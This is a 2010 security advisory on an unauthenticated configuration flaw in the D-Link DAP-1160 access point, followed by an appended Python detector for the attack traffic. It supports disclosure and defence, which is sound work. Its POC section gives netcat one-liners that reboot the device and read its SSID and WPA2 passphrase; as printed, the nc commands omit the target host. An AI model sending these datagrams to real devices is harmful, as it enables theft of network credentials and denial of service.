Security Advisory IS-2010-004 - D-Link DAP-1160 Unauthenticated Remote Configuration

Advisory Information
--------------------

Published: 2010-06-28
Updated: 2010-06-28
Manufacturer: D-Link
Model: DAP-1160
Firmware version: 1.20b06, 1.30b10, 1.31b01

Vulnerability Details
---------------------

Public References: Not Assigned

Platform:
Successfully tested on a D-Link DAP-1160 loaded with firmware versions v120b06, v130b10 and v131b01. Other models and/or firmware versions may also be affected.
Note: Only the major firmware version numbers are displayed on the administration web interface: 1.20, 1.30, 1.31.

Background Information:
The D-Link DAP-1160 is a wireless access point that gives wireless clients connectivity to wired networks. It supports the 802.11b and 802.11g protocols, and WEP, WPA and WPA2 encryption.

Summary:
Unauthenticated access to and modification of several device parameters, including the Wi-Fi SSID, keys and passphrases, is possible. An unauthenticated remote reboot of the device can also be performed.

Details:
DCCD is a UDP daemon that listens on port UDP 2003 of the device and is most likely used for easy device configuration via the DCC (D-Link Click 'n Connect) protocol. By sending properly formatted UDP datagrams to the dccd daemon it is possible to perform security-relevant operations without any prior authentication.
It is possible to remotely retrieve sensitive wireless configuration parameters, such as the Wi-Fi SSID, encryption types, keys and passphrases, along with other additional information. It is also possible to remotely modify such parameters and configure the device without any knowledge of the web administration password. Remote reboot is another operation that an attacker may perform without authentication, possibly triggering a Denial-of-Service condition.
POC:

- Remote reboot

    python -c 'print "\x05" + "\x00" * 7' | nc -u 2003

- Retrieving Wi-Fi SSID

    python -c 'print "\x03" + "\x00" * 7 + "\x21\x27\x00"' | nc -o ssid.txt -u 2003
    cat ssid.txt

  (cleartext SSID displayed after "21 27 xx xx" in the received datagram)

- Retrieving WPA2 PSK

    python -c 'print "\x03" + "\x00" * 7 + "\x23\x27\x00\x00\x24\x27\x00"' | nc -u -o pass.txt 2003
    cat pass.txt

  (cleartext WPA2 PSK displayed after "24 27 xx xx" in the received datagram)

Impacts:
- Remote extraction of sensitive information
- Modification of existing device configuration
- Possible Denial-of-Service

Solutions & Workaround:
Not available

Additional Information
----------------------

Timeline (dd/mm/yy):
17/02/2010: Vulnerability discovered
17/02/2010: No suitable technical/security contact on Global/Regional website. No contact available on OSVDB website
18/02/2010: Point of contact requested from customer service
----------- No response -----------
26/05/2010: Partial disclosure at CONFidence 2010
28/06/2010: This advisory

Additional information available at http://www.icysilence.org
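Since no vendor fix is listed, the practical defence is to monitor for the dccd request shapes shown in the Details and POC sections above. The following detection example is added here and is not part of the original advisory; the request layout (one opcode byte, seven zero bytes, then 2-byte parameter tags) and the "encryption" label for tag 0x2327 are inferred from the PoC datagrams, not from a published DCC specification.

```python
from dataclasses import dataclass, field
from typing import List, Optional
DCC_PORT = 2003
OPCODES = {0x03: "read-parameters", 0x05: "reboot"}
# 0x2127 (SSID) and 0x2427 (WPA2 PSK) are named in the advisory; 0x2327 is only
# requested alongside the PSK in the PoC, so the "encryption" label is an assumption.
SENSITIVE_TAGS = {b"\x21\x27": "ssid", b"\x23\x27": "encryption", b"\x24\x27": "wpa2-psk"}

@dataclass
class DccAlert:
    severity: str
    operation: str
    parameters: List[str] = field(default_factory=list)
    reason: str = ""

def classify_dcc_request(payload: bytes, dst_port: int = DCC_PORT) -> Optional[DccAlert]:
    """Alert on a UDP/2003 payload shaped like the advisory's PoC requests, else None."""
    if dst_port != DCC_PORT or len(payload) < 8:
        return None
    opcode = payload[0]
    # PoC requests: one opcode byte followed by seven zero bytes (layout inferred).
    if opcode not in OPCODES or any(payload[1:8]):
        return None
    if opcode == 0x05:
        return DccAlert("high", OPCODES[opcode], reason="unauthenticated reboot request (DoS)")
    body = payload[8:]  # parameter references follow the 8-byte header
    wanted = [name for tag, name in SENSITIVE_TAGS.items() if tag in body]
    if "wpa2-psk" in wanted:
        severity, reason = "critical", "unauthenticated read of WPA2 PSK"
    elif wanted:
        severity, reason = "high", "unauthenticated read of wireless settings"
    else:
        severity, reason = "medium", "unauthenticated dccd parameter read"
    return DccAlert(severity, OPCODES[opcode], wanted, reason)
def scan_datagrams(records) -> List[DccAlert]:
    """Classify (dst_port, payload) pairs, e.g. from a pcap, keeping only hits."""
    return [a for a in (classify_dcc_request(p, port) for port, p in records) if a]
# Constructed sample traffic: the three PoC requests plus two datagrams that must not match.
SAMPLE_RECORDS = [
    (2003, b"\x05" + b"\x00" * 7),                                    # reboot
    (2003, b"\x03" + b"\x00" * 7 + b"\x21\x27\x00"),                  # SSID read
    (2003, b"\x03" + b"\x00" * 7 + b"\x23\x27\x00\x00\x24\x27\x00"),  # PSK read
    (53, b"\x05" + b"\x00" * 7),                                      # wrong port
    (2003, b"\x03\x01" + b"\x00" * 6),                                # header not zero
]

if __name__ == "__main__":
    for alert in scan_datagrams(SAMPLE_RECORDS):
        print(f"[{alert.severity}] {alert.operation} {alert.parameters}: {alert.reason}")
```

Any hit on UDP/2003 from outside the management network is worth a ticket, because the device performs these operations without any authentication at all.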